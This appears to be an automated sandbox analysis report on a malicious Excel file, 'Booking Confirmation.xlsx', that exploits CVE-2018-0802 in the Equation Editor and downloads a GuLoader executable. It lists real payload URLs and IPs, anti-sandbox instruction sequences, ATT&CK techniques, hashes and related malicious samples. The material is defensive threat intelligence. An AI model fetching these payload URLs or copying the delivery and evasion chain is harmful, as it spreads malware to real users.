Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Booking Confirmation.xlsx

Stream path 'EncryptedPackage' entropy: 7.99982364057 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C42D3		4_2_003C42D3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C37F2		4_2_003C37F2

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003C7154 second address: 00000000003C7154 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003CA078 second address: 00000000003CA078 instructions:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003C7154 second address: 00000000003C7154 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003CA021 second address: 00000000003CA078 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 53673179h 0x00000007 sub eax, 2CF91FC3h 0x0000000c xor eax, 4DAF12BEh 0x00000011 sub eax, 6BC10307h 0x00000016 cpuid 0x00000018 jmp 00007F767C7D7CDEh 0x0000001a pushad 0x0000001b rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003CA078 second address: 00000000003CA078 instructions:

Source: C:\Users\Public\vbc.exe

Code function: 4_2_003C3427 rdtsc

4_2_003C3427

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2316

Thread sleep time: -360000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_003C3427 rdtsc

4_2_003C3427

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C482B mov eax, dword ptr fs:[00000030h]	4_2_003C482B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003CAA61 mov eax, dword ptr fs:[00000030h]	4_2_003CAA61
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C68D1 mov eax, dword ptr fs:[00000030h]	4_2_003C68D1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C9CCF mov eax, dword ptr fs:[00000030h]	4_2_003C9CCF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C9321 mov eax, dword ptr fs:[00000030h]	4_2_003C9321
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C479E mov eax, dword ptr fs:[00000030h]	4_2_003C479E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C37F2 mov eax, dword ptr fs:[00000030h]	4_2_003C37F2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C47D2 mov eax, dword ptr fs:[00000030h]	4_2_003C47D2

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp	Binary or memory string: !Progman

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Security Software Discovery41	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information11	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol121	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Extra Window Memory Injection1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery32	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Booking Confirmation.xlsx	26%	ReversingLabs	Document-OLE.Exploit.CVE-2018-0802

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	100%	Avira	HEUR/AGEN.1134908
C:\Users\Public\vbc.exe	100%	Avira	HEUR/AGEN.1134908
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	29%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	9%	ReversingLabs	Win32.Malware.Generic
C:\Users\Public\vbc.exe	29%	Virustotal		Browse
C:\Users\Public\vbc.exe	9%	ReversingLabs	Win32.Malware.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.vbc.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1134908		Download File
4.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1134908		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://103.155.82.236/nrsdoc/svchost.exe	0%	Avira URL Cloud	safe
https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://103.155.82.236/nrsdoc/svchost.exe	true	Avira URL Cloud: safe	unknown
https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.day.com/dam/1.0	F7B97C3D.emf.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.155.82.236	unknown	unknown		134687	TWIDC-AS-APTWIDCLimitedHK	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	433966
Start date:	14.06.2021
Start time:	08:52:50
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Booking Confirmation.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@4/17@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 16.5% (good quality ratio 5.3%) Quality average: 16% Quality standard deviation: 27.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:54:08	API Interceptor	67x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.155.82.236	BL_SGN11203184.xlsx	Get hash	malicious	Browse	103.155.82.236/fksdoc/svchost.exe
	spices requirement.xlsx	Get hash	malicious	Browse	103.155.82.236/fksdoc/svchost.exe
	2773773737646_OOCL_INVOICE_937763.xlsx	Get hash	malicious	Browse	103.155.82.236/fwkdoc/svchost.exe
	DRAFT BL_CMA_CGM.xlsx	Get hash	malicious	Browse	103.155.82.236/fwkdoc/svchost.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TWIDC-AS-APTWIDCLimitedHK	BL_SGN11203184.xlsx	Get hash	malicious	Browse	103.155.82.236
	spices requirement.xlsx	Get hash	malicious	Browse	103.155.82.236
	Cancellation_1844611233_06082021.xlsm	Get hash	malicious	Browse	103.155.92.95
	Cancellation_1844611233_06082021.xlsm	Get hash	malicious	Browse	103.155.92.95
	Rebate_18082425_05272021.xlsm	Get hash	malicious	Browse	103.155.93.185
	Rebate_18082425_05272021.xlsm	Get hash	malicious	Browse	103.155.93.185
	DEBT_06032021_861309073.xlsm	Get hash	malicious	Browse	103.155.93.93
	DEBT_06032021_861309073.xlsm	Get hash	malicious	Browse	103.155.93.93
	2773773737646_OOCL_INVOICE_937763.xlsx	Get hash	malicious	Browse	103.155.82.236
	Rebate_854427061_05272021.xlsm	Get hash	malicious	Browse	103.155.93.185
	Rebate_854427061_05272021.xlsm	Get hash	malicious	Browse	103.155.93.185
	Document_06022021_568261087_Copy.xlsm	Get hash	malicious	Browse	103.155.92.221
	Document_06022021_568261087_Copy.xlsm	Get hash	malicious	Browse	103.155.92.221
	DRAFT BL_CMA_CGM.xlsx	Get hash	malicious	Browse	103.155.82.236
	Document_06022021_1658142991_Copy.xlsm	Get hash	malicious	Browse	103.155.92.221
	Document_06022021_1658142991_Copy.xlsm	Get hash	malicious	Browse	103.155.92.221
	PO (2).exe	Get hash	malicious	Browse	103.153.182.50
	PO.exe	Get hash	malicious	Browse	103.153.182.50
	Rebate_850149173_05272021.xlsm	Get hash	malicious	Browse	103.155.93.185
	Rebate_850149173_05272021.xlsm	Get hash	malicious	Browse	103.155.93.185

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	147456
Entropy (8bit):	5.822963661672907
Encrypted:	false
SSDEEP:	1536:zK7pvMMhAYlnYgtuELhUQwe6KjEw5bMNccnuMG5reMFbCJQ:zCBqg197dvjEw5yccw5r7d
MD5:	EE83942376EA5717149517FCC832AB9F
SHA1:	EC75B10C6EF046CB63EAA20470AC94529FB4873A
SHA-256:	B3498937A71913D7101FAFB04EB48A791106BEC97E21839B2E1BE8BB55A3F5FC
SHA-512:	431CDD7E43FD6A4C4DF862297EEBC42E9CB68909647B57288A63BFE036D9D0560CC0E97D759BDA096E1389E3CD18D243E627CCE692660E2A384BE430623B2551
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Virustotal, Detection: 29%, Browse Antivirus: ReversingLabs, Detection: 9%
Reputation:	low
IE Cache URL:	http://103.155.82.236/nrsdoc/svchost.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...@.`R.....................0............... ....@..........................P.......X..........................................(....@..0...................................................................(... ....................................text............................... ..`.data...x.... ....... ..............@....rsrc...0....@.......0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B15974F.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2376BB51.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\539A36D9.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\60C1A490.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DE09D1A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0F13A2C.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7592
Entropy (8bit):	5.451630657563872
Encrypted:	false
SSDEEP:	96:zngF+cqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwi:b6lSTxK/LA/FVoL3QtKhn+e3+wi
MD5:	7D10A02D1CE6CBECF621A557AC6242DF
SHA1:	42E4CE1D7D07F9956CD22417969C8B62534C97BC
SHA-256:	11F1CDF0935334F53514E4B8CA4E096BBF56505458DD8FAC77EBEE917DF7BF13
SHA-512:	8F87BBD14F97BE4F22C2C3A76DF0F51A97819717353AA7D8D44C31125776CEF54CF5AC3CEBA51222BD16EB0D97AC4DA08923DD4F7B2CDE92607383F597957EF1
Malicious:	false
Preview:	....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d...........................'..t....\...............<...W..t.........6[v_..t.......t0K..DySw..R...............Pw..R.$.......d.......t...J^.t.... ^.tp.R...R.H.......-...$....<Ow................<..v.Z.v....X.]o....0K.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5867438.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	50311
Entropy (8bit):	7.960958863022709
Encrypted:	false
SSDEEP:	768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5:	4141C7515CE64FED13BE6D2BA33299AA
SHA1:	B290F533537A734B7030CE1269AC8C5398754194
SHA-256:	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512:	74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious:	false
Preview:	.PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..\|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..\|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.\|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE03F06.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1192904.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
